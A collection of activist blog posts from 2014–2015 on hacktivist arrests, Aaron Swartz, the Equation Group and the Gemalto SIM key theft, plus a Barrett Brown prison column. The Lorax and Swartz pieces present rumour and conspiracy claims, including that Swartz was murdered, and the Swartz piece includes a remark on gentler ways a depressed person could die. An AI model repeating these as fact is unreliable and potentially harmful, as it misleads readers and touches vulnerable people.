Adam Bennett Anon

Mar 19, 2015 | Anonymous, Whistleblowers & Dissidents

Anonymous radio host know as Lorax aka Adam Bennett Anon was arrested (full article).

Everybody who has known Adam ‘Lorax’ Bennett aka Adam Bennett Anon knows he’s an awesome anon. Furthermore, the article now let us know he was also involved in his local community as an experienced life saver and a fundraising manager for Cancer Support. This kind of person doesn’t belong in jail! He belong to it’s people. The people he give each day of is life to protect.

If you’ve know Lorax, or Adam John Bennett, now is the time to get involved and help!

https://twitter.com/Loraxlive/status/467566452015251456

Take action

Read the #FreeAnons press Releases : We are All Lorax
Read tweets and tweet with the #FreeLorax hash tag
Read this PasteBin
Keep posted for more information!

Articles about the arrest

Surf champ accused of hacking
“Anonymous” hackers charged for targeting Australia, Indonesia
‘Anonymous hacker’ in court in Perth
Hackers charged for targeting Australia, Indonesia
Two Australian Anonymous members arrested for hacking Australian and international websites
AFP arrests two alleged ‘Anonymous’ members

Was The Lorax Setup?

The lifesaving Lorax’s tale took an interesting turn the last few nights, as the internets and ircs were ablaze with controversy, flame wars, and a little good-ole-fashioned ‘he-said she-said.’ What was already looking like a classic tale of governmental overreach and the suppression of Adam John Bennett’s Civil-Rights is turning into a dark tale of deception, duplicity, and police-led treachery. While there was much argument among the anons present, one thing was very clear, the Australian government had tricked and deceived a minor in an unsuccessful attempt to lure the Lorax into a hacking scheme. Having failed in that they have continued to attempt to argue that the research work that he did at his job for a Cancer fighting charity that showed a clear problem with the same security protocol that the Australian Government was proposing using with it’s upcoming, Telecommunications (Interception and Access) Amendment (Data Retention) Bill 2014, plan for telecoms to keep their customer’s e-mail and phone metadata for two years.

Soon after Bennett began criticizing the plan there was an alleged hack into AATP (third-largest telecom in Australia) and the Indonesian government, Anonymous was blamed. The Government initially charged the Lorax and two hackers with the breach. After nearly a year of delays and continuations, the court announced that all of the charges for hacking by Bennett would be dropped, but replaced with obscure sounding charges like, “aiding and harassment.” It has become ever more clear that there wasn’t ever much of a case and the government is using Bennett’s bail restrictions to keep his LoraxLive show off of the air.

This dark tale really begins in 2011, even before the government started suggesting an ill-conceived data retention scheme, before anyone hacked AATP and the Indonesian government. Back in the heyday of lulzsec a 15 year-old hacker who we’ll call Hacker-Z (not his real hacker handle) was caught up in the glamour and prestige of the lulzsec-style direct-action hacking. Hacker-Z was like almost nearly ever teenage boy he wanted to listen to loud music and raise a little hell. That sounds anti-social perhaps, but when you see that the things that young hacktivists want to break are things like evil autocratic governments like Libya or Tunisia, or on-line bullying groups, that anti-social streak can begin to turn an odd shade of heroic on a young person. Apparently, according to general consent, it wasn’t hard for the same sort of Five Eyes investigators–who were at that same time acting as the nefarious Sabu’s puppet masters, in a separate scheme to entrap Anons–to get a hold of this inspired, if naive teenager.

Having entrapped the would-be activist with an illegal hacking scheme, they first terrified the lad and his mother with the prospect of nearly life in prison for his unsuccessful attempt, while being directed by undercover government agents, to hack government and military websites; according to some in the chatroom. Having scared his mother as best they could it was easy for the police to convince her to give consent for them to use their son as a mole to keep an eye on on-line hacktivists. Any mother if, confronted with the prospect of sending her only child to prison, for probably, the rest of his life would almost surely make the same decision. Having Hacker-Z as a mole worked well for the police apparently, he was generally reported to be a friendly, helpful, and affable young man. No one on this side of things is sure how much information he really got in his few years, probably, working for the police, but needless to say when he was arrested with the Lorax, many a hard drive was wiped, just in case.

It seems the feds kept Hacker-Z on ice until the day they needed him. That day came, apparently, during the summer of 2012, when the Australian Government first proposed the current anti-privacy legislation that they are quietly pushing through the legislature right now. When The Lorax caught wind of the Government’s plan he immediately saw the obvious problems with warehousing the entire Australian population’s personal web data. Even if the government could show an actual need for all of this personal, which they can’t, Bennett honed in on the first and most obvious problem, security. Eventually Bennett showed, at his workplace, while testing their server, that recent flaws found in OpenSSL, the so called “Heartbleed Bug” could eventually lead to losses of citizen’s personal data to criminals or terrorists, if the government continued with their data retention plan.

Seeing the problem the Lorax did what the Lorax does when the community is in danger; he warned people through his popular show, Lorax Live, whose archives, that haven’t been seized by the government, can be heard here and here. Obviously, the leaders and politicians backed by corporatism and fully vested in the telecom industry, couldn’t afford to have a lot people aware of or critical of their massive transfer of both citizen’s data and the nation’s wealth, in the form of fees paid by taxes, to the nation’s telecoms. No, classically, power becomes annoyed when confronted by truth, this story is no different.

By the Winter of 2012, as far as the Australian government and the Australian Federal Police were concerned; the Lorax had to be silenced. Later when they learned that, while at his job testing his employer’s server’s security, Bennett had discovered a way that the “Heartbleed Bug” might be used to access encrypted files on a server, the very sort of thing that privacy advocates had been screaming about ever since the government first suggested the data retention program, government agents hatched a plan to silence the Lorax.

The police knew that they would never convince a reputable, white-hat security researcher like Adam John Bennett to participate in a criminal attack on the internet’s infrastructure. It is rumored that the police devised a plan to implicate the Lorax without needing him to take part in any illegal activity. To do this, they gathered up their friendly young, unfortunate mole, Hacker-Z and sent him into an irc chat with the Lorax and had him plead with Bennett to give him, Hacker-Z, Bennett’s note’s from his research work on OpenSSL. The authorities, it seems, hoped that by obtaining information on how one might be able to attack encryption from the researcher they could implicate him in a crime and, at least, keep his radio show off the Internet until they got their data retention plans passed into law.

Perhaps more despicable than the government’s attempt frame and implicate a man are its motives, of depriving a citizen of his civil-rights, and its methods of abusing the criminal justice system through the attempted entrapment of an innocent man, and misuse of a citizen’s right to bail in order to silence a benign, but vocal critic of governmental corruption and malfeasance. This is not Syria or Zimbabwe where a critic can simply be tossed in a hole or executed by despots, in “free” societies, like Australia, you must design administrative and judicial straps with which to bind their tongues and hands to things like restrictive bail requirements or plea agreements, to trumped up or false charges. The critic is silenced, the powers-that-be have no blood on their hands, the media calls the former hero-of-the-people a villain, and whatever danger the critic was fighting against is forgotten. It’s all very civilized.

If the police were unaware of who they were dealing with or simply unfamiliar with the world of white-hats is unclear. Bennett did not give their mole any help or information, and not because he believed he was a mole. (As a white-hat researcher Bennett was well aware of cyber-crime and the need for enforcement in the field, it can assuredly be assumed then that he supports law-enforcement and legitimate undercover operations, but any thinking adult would have to wonder about the wisdom of using children as moles to bait and entrap adult criminals.) No, it is rumored that Bennett refused to help the boy, not because he believed he was working with police, rather he believed that the youth might be an impassioned young hacktivist who could possibly do something unwise or damaging with the information, something that might hurt others as well as get the lad in trouble with the law. Most likely, in Bennett’s mind, the young Hacker-Z would be better off waiting until the bugs in OpenSSL were fixed to get a look at the Lorax’s research notes.

Blown off course, but not sunk by the Adam John Bennett’s integrity, the Australian Government tried a new, indirect tack to get their entrapment scheme back on course. They would have Hacker-Z engage an intermediary, another White Hat researcher, someone the Lorax would trust. They found him in a passionate young researcher we’ll call Hacker-X. Hacker-X was known as a knowledgeable and helpful security expert. He had long been very helpful getting newbloods on the right track on-line and helping others secure their computer systems. Like a lot of hacker culture Hacker-X believes in education and the open-sharing of information, not to cause damage but to protect from damage.

Imagine you bought a lock for your front door, it’s a common lock, and there are many like it in your neighborhood. If there was a flaw in that lock that could allow criminals to enter your home then you would like to know about it, wouldn’t you? Of course you would, and it would be good for you to know so you could find a way to fix it or replace it, so the burglars can’t come in. Certainly, you wouldn’t want burglars to know about the flaw, but luckily the vast majority of humans aren’t burglars, likewise very few people interested in computer security are criminals. So, for a researcher such as Hacker-X to want to share something that could easily be used to help secure a network, is understandable and legal. It’s not clear if he already had possession of the notes from Lorax’s research into OpenSSL, or if he actually obtained them on behalf of Hacker-Z, regardless, sharing information about a weakness in an encryption protocol is not illegal, as the Australian Government’s delays and recent charge droppings indicate.

Whether the police were directly involved in or only supervising the alleged hacks on AATP and the Indonesian government isn’t clear, but it has become very clear that they never had any evidence against Adam John Bennett, the Lorax. In an extraordinary judicial move they have dropped all of the charges against Bennett, but have come up with ten new charges that, they claim they will commit to at his next hearing in June. While on one hand it is great to think that the Lorax may end up getting the justice he deserves in a dismissal of all charges at his next hearing, what is maddening is the obvious and bald faced way in which the Australian Government is misusing the criminal justice system to keep him Bennett on the restrictive bail terms that prevent him from broadcasting his show, LoraxLive and his protest about the government’s data retention plan.

Aaron Swartz – Programmer, Activist

Mar 13, 2015 | Events & Assassinations, Whistleblowers & Dissidents

Aaron Swartz was a computer programmer and Internet activist who is often referred to as the third founder of Reddit.

Early Years

Aaron Swartz was born on November 8, 1986, in Chicago. Precocious from the start, Swartz taught himself to read when he was only three, and when he was 12, Swartz created Info Network, a user-generated encyclopedia, which Swartz later likened to an early version of Wikipedia.

Info Network landed Swartz in the finals for the ArsDigita Prize, and he also was invited to join the RDF Core Working Group of W3C (World Wide Web Consortium), a group assembled to help the Web evolve.

RSS & Creative Commons

Swartz’s next steps were co-authoring news aggregator RSS 1.0 (which went on to become the industry standard) and moving to San Francisco to write code for Creative Commons, a public domain watchdog group. He then headed to California to study sociology at Stanford University. At Stanford, he downloaded law review articles from the Westlaw database and used the data to write an important paper about the connection between research funders and biased results. However, he left academia after only a year, taking a leave of absence to join Y Combinator, an incubator for up-and-coming Internet talent.

Also around this time, Swartz’s new project, Infogami, merged with Reddit.com, making Swartz a co-founder of the resulting company. Reddit had millions of visitors per month when Condé Nast bought it a year later (2006).

In 2008 Swartz wrote “Guerilla Open Access Manifesto,” which was an argument against information being hoarded and controlled by any particular group. The document ended with a demand that information be freely available and grabbed forcibly, if need be: “We need to take information, wherever it is stored, [and] make our copies and share them with the world.”

Felony Charges

That fall, Swartz decided to take on PACER, a system that charged users to download court documents. Through an algorithm he wrote, Swartz downloaded 19,865,160 pages of text from the database. By the spring of 2009, FBI agents were at Swartz’s door, questioning him about the downloads. The investigation was dropped, but a year later Swartz began downloading academic articles from the JSTOR archive at MIT, ending up with around 5 million documents. Swartz’s motivation for downloading the articles was never fully determined, however, friends and colleagues believe his intention was either to upload them to the Internet to share them with the public or analyze them to uncover corruption in the funding of climate change research.

After launching activist group Progressive Change Campaign Committee and later Demand Progress, in January 2011, Swartz was detained in Cambridge, Mass. by police and Secret Service agents. Since his activities in PACER, the government had been watching, and by July 2011, Swartz was facing multiple counts of computer and wire fraud, charges that could have resulted in 35 years in federal prison.

Suspicious Death – Murdered?

When Aaron Swartz refused to deal with the devil, did the government “suicide” him?

“You could eat a sandwich in the time it takes to suffocate from hanging. If he really was as depressed as media says, he could have easily gotten a prescription for Xanex, put on some nice music, light some candles and gone to sleep and never wake up. Why hanging? “

Latest- Gordon Duff Blames CIA “rogue elements” (right!) — “No question this was a murder.”

Aaron Swartz was found hung in his Brooklyn apartment. The coroner and Media say he killed himself.

Swartz was no Occupy Wall Street hippie. At 27, he’d already reached the top of his field. He was a software genius and Internet champion. He co-authored the “RSS 1.0” a widely-used syndication format. he also co-founded Reddit which was sold to Conde Naste. He founded Open Library, an internet database dedicated to obtaining public domain documents that had been appropriated by private interests. He ‘hacked’ the Library of Congress database and uploaded it to Open Library making it available for free.

The “social media” industry has virtually taken over every aspect of human communication. This industry increasingly is synonymous with erosion of privacy and commercialism. The movie, ‘The Social Network’ glorified Facebook’s CEO Mark Zuckerberg, as a ‘genius’ at betrayal of friends and classmates in order to get sex, money, and power.

Aaron Swartz wasn’t as famous as Mark Zuckerberg – but he was an effective advocate for freedom of information. He wasn’t billionaire, or even a millionaire, though he could have been. Harvard law professor Lawrence Lessig said, “He never did anything for the money”.

LEGAL PROBLEMS

In 2010, Swartz downloaded the entire JSTOR archives because the organization pays the publishers of scholarly articles, not the authors.

On July 19th, 2011, the Attorney General of Massachusetts threw the book at him. He was charged under the 1986 Computer Fraud and Abuse Act, otherwise known as “hacking”. But this broad, fuzzy law wasn’t a good fit for downloading uncopyrighted articles with intent to redistribute.

At the moment, that’s not a crime yet. Making such a thing a crime is what the PIPA / SOPA bills meant to do. Undaunted by the warning from Federal muscle to “chill”, last year Swartz was a significant organizer against the SOPA bill that threatened freedom of information access on the internet.

Lawrence Lessig, said, “The government was not gonna stop until he admitted he was a felon. In a world where the architects of the financial crisis regularly dine at the White House, it’s ridiculous to think Aaron Swartz was a felon.”

Lessig knew Aaron for twelve years. He was Swartz’ advisor on intellectual property law for Creative Commons and Open Library.

WAS HE MURDERED?

The mainstream media has been doing a snow job to make us believe that Aaron Swartz committed suicide by tying a rope around his neck and hanging himself.

Personally, I think he would have been creative enough to think of a less horrible way to die. You could eat a sandwich in the time it takes to suffocate from hanging. If he really was as depressed as media says, he could have easily gotten a prescription for Xanex, put on some nice music, light some candles and gone to sleep and never wake up. Why hanging?

Hanging is a horrible way to die. The sentence of hanging was intended to send a message to other offenders “this could happen to you”. I think that’s why Aaron Swartz died by hanging. It’s a message to other activists — probably those he knew who worked with him.

Swartz’s father is an intellectual property consultant to MIT’s computer lab. At Aaron’s funeral, he said his son was killed by the government.

Media has since spun Swartz’ father’s remark as if it he was speaking figuratively. Don’t you believe it. I don’t like the way mainstream media writers frame Swartz’s hanging as a reaction to ‘bullying’. It implies Swartz was afraid of the government, that he was a coward, or mentally ill.

That’s not it. Swartz’s career shows the familiar pattern of attempts to assimilate him into the system – scholarship to Stanford, lucrative job under auspices of WIRED, a fellowship from Harvard’s institution on ethics. All these perks failed to control him, so they switched to Federal muscle tactics.

Each attempt to control him drove him further beyond the pale. But I think his death warrant wasn’t issued till last year when he became an effective leader of a million people and stopped the PIPA and SOPA bills. Effective leaders aren’t allowed.

Bertrand Russell wrote frankly that geniuses would be carefully offered a place with the elite, but those that persisted in bucking the system would be exterminated. From “The Scientific Outlook”, 1931, Russell wrote;

“On those rare occasions, when a boy or girl who has passed the age at which it is usual to determine social status shows such marked ability as to seem the intellectual equal of the rulers, a difficult situation will arise, requiring serious consideration. If the youth is content to abandon his previous associates and to throw in his lot whole-heartedly with the rulers, he may, after suitable tests, be promoted, but if he shows any regrettable solidarity with his previous associates, the rulers will reluctantly conclude that there is nothing to be done with him except to send him to the lethal chamber before his ill-disciplined intelligence has had time to spread revolt. This will be a painful duty to the rulers, but I think they will not shrink from performing it.”

Lessig said “Aaron Swartz is now an icon, an ideal. He is what we will be fighting for, all of us, for the rest of our lives.”

by Richard Evans (henrymakow.com)

Mysterious Shadow Hackers: The Equation Group

Feb 25, 2015 | Black Technology, WAR: By Design

An unnamed scientific researcher walks out to her mailbox, shuffles through some bills and advertisements, and pulls out an envelope containing a CD of pictures from a recent scientific conference the researcher had attended in Houston. Excited – though maybe a bit nervous – to see the candid photos of herself and her colleagues snapped by an excitable event photographer, the researcher walks inside, casually drops the unopened bills on the kitchen table, opens up her laptop, and slides in the CD. Windows asks if she’d like to open the pictures to view them. She accepts, and the pictures pop up in the photo viewer. One by one she clicks through them, viewing the photos from the event. She reminisces fondly, wincing only at that one photo where she looks either drunk or high, making mental note of the pictures to print out for her lab desk.

What the researcher doesn’t see, however, is a malicious payload – a virus, one of the most sophisticated known to man – secretly installing itself in the background of her computer. This virus would give a certain secret group of individuals complete access to her system, a group which had hijacked the package mid-transit in the mail, replaced the original CD with a copy that included the virus, taped everything back up without evidence of tampering, and sent the package on its way to her. The virus was practically untraceable and completely irremovable; it could map out networks, jump to computers not connected via the Internet, and even selectively target and destroy specific computers much like a bioengineered nano-virus – all at the direction of a secret shadow organization that was covertly infiltrating the world’s most secure computer systems.

The Equation Group

What may sound like the start to a Tom Clancy novel, or an episode of 24, is, in fact, completely real, the likes of which actually happened to one or more researchers back in 2009. In fact, surreptitious, interdiction-based cyberattacks like this one have apparently been happening since at least the early 2000s and may date back to 1996.

Last Monday, Moscow-based Kaspersky Lab released a cybersecurity report uncovering details about the most sophisticated, covert, and pervasive hacker groups known to man and possibly ever imagined. The organization, dubbed the Equation Group due to the group’s affinity towards sophisticated encryption methods, had operated practically undetected for over a decade, silently infecting computers across the globe and delivering attack payloads still unknown.

“There is nowhere I can’t go. There is nowhere I won’t find you.” – Bane, The Matrix Revolutions

Kaspersky Lab, a cybersecurity firm known primarily for its antivirus software, is no stranger to hackers. The company tracks and documents security breaches of all shapes and sizes.

For years, most high-profile computer hacks had been primarily the work of individuals or small groups motivated by curiosity or, more recently, financial interest – gray-collar criminals who would infiltrate computer systems for credit card numbers to sell on the black market. Usually these attacks are relatively unsophisticated, relying on bad operational cybersecurity practices (dubbed “opsec”) from corporations to create exploitable security holes like those seen in the recent Target and Home Depot security breaches. Only upon the discovery of the Stuxnet virus in June 2010 that sabotaged Iran’s Natanz uranium enrichment facilities have cybersecurity researchers and the public at large turned an eye towards advanced persistent threats (APTs) which use advanced hacking techniques capable of bypassing strong opsec protocols.

What make Equation Group so impressive are their “almost superhuman” technical feats, which include never-before-seen levels of ingenuity in hacking, engineering, and encryption. Those feats include:

using virtual file systems like those found in the Regin (a.k.a. WarriorPride) malware attack used by the NSA to infect overseas computers;
the ability to infect and surveil sensitive air-gapped (i.e. non-Internet connected) networks by piggybacking on USB flash drives, much like the Stuxnet virus;
encrypting malicious files and storing them in multiple branches of the Windows registry, making it immune to detect with antivirus software;
using over 300 Internet domains and 100 servers to command and control malware infrastructure; and
hijacking URL requests on iPhones to spoofed Mac servers, which indicates that Equation Group has compromised the iOS and OSX operating systems.

Hollywood good

Perhaps most impressive is an Equation Group malware platform that rewrites the firmware of infected hard drives, allowing the virus to survive even low-level reformatting that is used to securely wipe a hard drive. All major hard drive manufacturers have drive models that have been compromised, including Western Digital, Seagate, Maxtor, Samsung, IBM, Toshiba, and Micron. Once the drive has been infected, the malware is completely impossible to detect or remove; the drive is compromised forever.

Forensics software displays, in Matrix-like fashion, some of the hard drives Equation Group was able to successfully hijack. (Credit: Kaspersky)

The difference in sophistication between your average Internet hacker and Equation Group cannot be understated. Your run-of-the-mill hacker is more or less equivalent to your run-of-the-mill burglar, who might break into a place with all of the sophistication of opening an unlocked door or busting out a window with a crowbar. APTs are more like museum thieves who might dress up like a guard or clone a keycard to snatch a valuable diamond or painting. Equation Group is an APT well beyond its peers, using super-spy tactics with analogical laser grids, vent shafts, and harnesses to swap a diamond with a perfect replica, remaining entirely undetected. It’s the stuff of Hollywood’s Mission: Impossible, only without the gratuitous explosions and Tom Cruise (…at least as far as anyone knows). And like Mission: Impossible, Equation Group is more than likely a clandestine operation of the U.S. government.
via RedOrbit

Leaked: NSA Spies Steal Encryption Keys from Global SIM Manufacturer

Feb 25, 2015 | Leaks, News

AMERICAN AND BRITISH Leaked: NSA Spies hacked into the internal computer network of the largest manufacturer of SIM cards in the world, stealing encryption keys used to protect the privacy of cellphone communications across the globe, according to top-secret documents provided to The Intercept by National Security Agency whistleblower Edward Snowden.

The hack was perpetrated by a joint unit consisting of operatives from the NSA and its British counterpart Government Communications Headquarters, or GCHQ. The breach, detailed in a secret 2010 GCHQ document, gave the surveillance agencies the potential to secretly monitor a large portion of the world’s cellular communications, including both voice and data.

The company targeted by the intelligence agencies, Gemalto, is a multinational firm incorporated in the Netherlands that makes the chips used in mobile phones and next-generation credit cards. Among its clients are AT&T, T-Mobile, Verizon, Sprint and some 450 wireless network providers around the world. The company operates in 85 countries and has more than 40 manufacturing facilities. One of its three global headquarters is in Austin, Texas and it has a large factory in Pennsylvania.

In all, Gemalto produces some 2 billion SIM cards a year. Its motto is “Security to be Free.”

With these stolen encryption keys, intelligence agencies can monitor mobile communications without seeking or receiving approval from telecom companies and foreign governments. Possessing the keys also sidesteps the need to get a warrant or a wiretap, while leaving no trace on the wireless provider’s network that the communications were intercepted. Bulk key theft additionally enables the intelligence agencies to unlock any previously encrypted communications they had already intercepted, but did not yet have the ability to decrypt.

As part of the covert operations against Gemalto, spies from GCHQ — with support from the NSA — mined the private communications of unwitting engineers and other company employees in multiple countries.

Gemalto was totally oblivious to the penetration of its systems — and the spying on its employees. “I’m disturbed, quite concerned that this has happened,” Paul Beverly, a Gemalto executive vice president, told The Intercept. “The most important thing for me is to understand exactly how this was done, so we can take every measure to ensure that it doesn’t happen again, and also to make sure that there’s no impact on the telecom operators that we have served in a very trusted manner for many years. What I want to understand is what sort of ramifications it has, or could have, on any of our customers.” He added that “the most important thing for us now is to understand the degree” of the breach.

Leading privacy advocates and security experts say that the theft of encryption keys from major wireless network providers is tantamount to a thief obtaining the master ring of a building superintendent who holds the keys to every apartment. “Once you have the keys, decrypting traffic is trivial,” says Christopher Soghoian, the principal technologist for the American Civil Liberties Union. “The news of this key theft will send a shock wave through the security community.”

THE MASSIVE KEY THEFT IS “BAD NEWS FOR PHONE SECURITY. REALLY BAD NEWS.”

Beverly said that after being contacted by The Intercept, Gemalto’s internal security team began on Wednesday to investigate how their system was penetrated and could find no trace of the hacks. When asked if the NSA or GCHQ had ever requested access to Gemalto-manufactured encryption keys, Beverly said, “I am totally unaware. To the best of my knowledge, no.”

According to one secret GCHQ slide, the British intelligence agency penetrated Gemalto’s internal networks, planting malware on several computers, giving GCHQ secret access. We “believe we have their entire network,” the slide’s author boasted about the operation against Gemalto.

Additionally, the spy agency targeted unnamed cellular companies’ core networks, giving it access to “sales staff machines for customer information and network engineers machines for network maps.” GCHQ also claimed the ability to manipulate the billing servers of cell companies to “suppress” charges in an effort to conceal the spy agency’s secret actions against an individual’s phone. Most significantly, GCHQ also penetrated “authentication servers,” allowing it to decrypt data and voice communications between a targeted individual’s phone and his or her telecom provider’s network. A note accompanying the slide asserted that the spy agency was “very happy with the data so far and [was] working through the vast quantity of product.”

The Mobile Handset Exploitation Team (MHET), whose existence has never before been disclosed, was formed in April 2010 to target vulnerabilities in cellphones. One of its main missions was to covertly penetrate computer networks of corporations that manufacture SIM cards, as well as those of wireless network providers. The team included operatives from both GCHQ and the NSA.

While the FBI and other U.S. agencies can obtain court orders compelling U.S.-based telecom companies to allow them to wiretap or intercept the communications of their customers, on the international front this type of data collection is much more challenging. Unless a foreign telecom or foreign government grants access to their citizens’ data to a U.S. intelligence agency, the NSA or CIA would have to hack into the network or specifically target the user’s device for a more risky “active” form of surveillance that could be detected by sophisticated targets. Moreover, foreign intelligence agencies would not allow U.S. or U.K. spy agencies access to the mobile communications of their heads of state or other government officials.

“It’s unbelievable. Unbelievable,” said Gerard Schouw, a member of the Dutch Parliament, when told of the spy agencies’ actions. Schouw, the intelligence spokesperson for D66, the largest opposition party in the Netherlands, told The Intercept, “We don’t want to have the secret services from other countries doing things like this.” Schouw added that he and other lawmakers will ask the Dutch government to provide an official explanation and to clarify whether the country’s intelligence services were aware of the targeting of Gemalto, whose official headquarters is in Amsterdam.

Last November, the Dutch government proposed an amendment to its constitution to include explicit protection for the privacy of digital communications, including those made on mobile devices. “We have, in the Netherlands, a law on the [activities] of secret services. And hacking is not allowed,” Schouw said. Under Dutch law, the interior minister would have to sign off on such operations by foreign governments’ intelligence agencies. “I don’t believe that he has given his permission for these kind of actions.”

The U.S. and British intelligence agencies pulled off the encryption key heist in great stealth, giving them the ability to intercept and decrypt communications without alerting the wireless network provider, the foreign government or the individual user that they have been targeted. “Gaining access to a database of keys is pretty much game over for cellular encryption,” says Matthew Green, a cryptography specialist at the Johns Hopkins Information Security Institute. The massive key theft is “bad news for phone security. Really bad news.”

…Continued at Firstlook.org

Barrett Brown – Journalist, Activist

Dec 11, 2014 | 2020 Relevant, Leaks, Whistleblowers & Dissidents

Barrett Brown is an American journalist, essayist and satirist. He is often referred to as an unofficial spokesperson for the hacktivist collective Anonymous, a label he disputes. He is credited with the creation of Project PM, a research outfit and information collective determined to expose agents of the corporate military spying apparatus. Brown’s large vocabulary and quick wit often make his thoughts a joy to read.

The Barrett Brown Review of Arts and Letters and Jail: A Funny Thing Happened on the Way to the Prison

The seven guys with whom I recently spent two months living in a small room at the Kaufman County Jail while awaiting transfer were in the distressing habit of compulsively watching local TV news, which is the lowest form of news. They would even watch more than one network’s evening news program in succession, presumably so as to get differing perspectives on the day’s suburban house fires and rush-hour lane closings rather than having to view these events through a single ideological prism.

One day, there was a report about a spate of bank robberies by a fellow the media was dubbing the Lunch Money Bandit after his habit of always striking around noon, when tellers were breaking for lunch. Later that week, there was another report on the suspect, accompanied by surveillance footage — and then, shortly afterward, he was actually brought in to our cell, having just been captured when the cops received a tip from a former accomplice who’d been picked up on unrelated charges.

Lunch Money was an affable twentysomething guy from New Orleans who’d lost his two front teeth fighting off a couple of assailants who’d tried to rob his family’s motel room after Katrina and had already done four years in federal prison for other bank robberies. He would have gladly taken a real job if he’d been able to find one, he said. Still, he conceded, “I just love robbing banks.” I couldn’t imagine what there is to love about such a career; this isn’t the old days when a bank robbery entailed brandishing a Tommy gun, dynamiting a safe, and tearing off in a stolen Model T roadster with your hard-drinking flapper girlfriend and a dozen cloth sacks adorned with dollar sign symbols. These guys today just sort of walk up to the teller and hand over a note to the effect that they have a gun (which they don’t — going armed carries a more serious charge, and there’s no point in bringing a gun to a bank that’s federally insured, even in Texas).

Drug dealers find bank robbers to be fascinating eccentrics and tend to pepper them with questions. One cocaine entrepreneur asked Lunch Money, “What if, like, when you handed her the note, the bitch just laughed in your face?”

“Man, that’d be fucked up,” he replied thoughtfully, visibly shaken by this potential revolution in human affairs.

One night, as we all lay in our bunks discussing the wicked world, Lunch Money proclaimed that Magic Johnson had never actually had HIV and that the whole thing had merely been a plot by the CIA, which had paid him handsomely to fake it so that he could later pretend to “recover” and the U.S. medical establishment could take credit for having developed such effective HIV treatments. As evidence, he noted that Johnson was inexplicably worth over a billion dollars. I debated with him about this for an hour. I’m not too bothered by my five-year prison sentence, as it will be neat to get out when it’s over and see to what extent video game graphics have improved while I was away, but I sure would like to get back the hour I spent arguing about Magic Johnson’s HIV status with the fucking Lunch Money Bandit.

***

The other day I was woken up at 4:30 am, escorted to a small, bare room, strip-searched, put in handcuffs and leg shackles, had a heavy chain wrapped around my midsection, and placed in the back of a dark and cage-lined van that looked like something from one of those Saw movies. But this was good news. It meant that, having recently gotten my ludicrous sentence, I’d now been “designated.” A crack team of specially trained federal prison picker-outers had chosen a facility for me. I was now to begin the multi-stage pilgrimage to the particular compound where I’ll be spending the next one to two years, depending on whether I get into any further trouble (so, two years).

For the majority of federal defendants, this Prisoner’s Progress, as I’m pleased to call it, entails “catching chain,” or being put on the weekly prison bus and taken to the federal inmate processing facility in Oklahoma, where the federal government has been sending its victims since the Trail of Tears. They’ll spend a week or so there before being shipped in turn to their designated prison. Prisons being far more humane than the amusingly horrid little detention centers where most inmates facing charges are kept until they inevitably give in and plea to a crime, this journey is viewed with fond anticipation by federal prisoners, who thus constitute the only population in human history among which it is common to be excited about the prospect of going to Oklahoma.

As for me, I’d rather rip off my own balls and mail them to Stratfor as restitution than set foot in a third-rate state like Oklahoma, regardless of what wonders may lie at the end of that particular rainbow, so it’s a fine thing that I was just going down the road to the Fort Worth Federal Correctional Institution, which will be my home for the next, er, two years. I know little of Fort Worth other than that it’s a lawless haven for half-caste Indian fighters and shiftless part-time cowhands looking to blow their greenbacks and Comanche scalps at one of the town’s countless Chinese-run opium dens, nor am I bothered by the possibility that what little I do know about the town may be 130 years out of date and racist. But I specifically requested that I be sent to this benighted city’s federal prison. For one thing, I’d already “toured the campus,” as it were, shortly after my arrest, when I spent two months at FCI Fort Worth’s jail unit so that the resident psychologists could subject me to a competency evaluation. (Based on their report, Judge Sam Lindsay declared me competent to participate in a trial, which is more than I can say for Judge Sam Lindsay.)

Fort Worth is also the only federal prison aside from FCI Seagoville that’s located near Dallas, and I’m pretty sure I’m still banned from that one, as noted in a prior column, and naturally I want to be close to my parents so that they can visit me with some regularity. My mom, a writer and editor and former flight attendant and South Texas beauty queen who once took me on a vacation to see a swimming pig at a place called Aquarena Springs, is a valuable fountainhead of media gossip, including which outlets are currently going down in flames (The New Republic, as it turns out), and always makes sure to let me know whether and to what extent my haircut is inadequate. Sometimes, if I happen to have a pimple, she insists on popping it right then and there in the visiting room, right in front of the other criminals. Note that I am 33 years old and, arguably, a hardened convict.

Likewise, my dad is my chief source of information regarding plot developments in what I gather to be a popular television program called The Blacklist, new episodes of which he details to me at great length at every opportunity, although I have never asked him for these reports or expressed any interest in the show whatsoever. Incidentally, when I was a kid, he took me on five different occasions to see a film called Hard Target in which the protagonist, ably portrayed by Jean Claude van Damme, finds himself hunted for sport by a wealthy fellow and his mercenary squad of professional trackers, all of whom he ends up killing in turn. My dad also gave me a promotional poster for this movie and, for years afterward, would turn to me and solemnly proclaim the film’s tagline, “Don’t hunt what you can’t kill,” which I suppose is as good advice as any.

Last time he came for a visit, he began to relate to me, apropos of nothing, the nature and potential killing power of some sort of subterranean supervolcano located at Yellowstone and the general circumstances under which it will someday explode and kill a great majority of North Americans, an event which he prophesied with obvious relish. It’s not that he’s one of those ecological mystics who despise humanity and long to see Mother Earth fight back against the ravages of industrial sentience or some such irritating thing. Quite the contrary. In my younger days, he would often drag me around East Texas and command me to assassinate deer and wild boars with rifles he would supply for the purpose, even though I had no ideological differences with any of these animals, and one time, when I was 17, he took me to East Africa to help him exploit the resident natural resources alongside a group of ex-military adventurers with whom we had somehow managed to attach ourselves (this expedition failed rather spectacularly), and lately he seems to have gotten involved in fracking. So he’s certainly no partisan of Nature. It’s just that he’s fond of power in its rawest forms, and if he smiles at the prospect of 400 million deaths, it is only because he feels that man is insufficiently reverent of this particular supervolcano, this god-made-manifest, which therefore has no choice but to lash out against us as punishment. He’s also a longtime pillar of the Dallas Safari Club and on at least one occasion of which I am aware was literally almost eaten by a lion. I could go on and on. Thankfully my parents are divorced, and so I usually only have to deal with these hyperactive Southern Gothic archetypes one at a time these days. Occasionally, though, they set aside their differences in order to come harass me together, and I eventually emerge from the visitation room looking haunted.

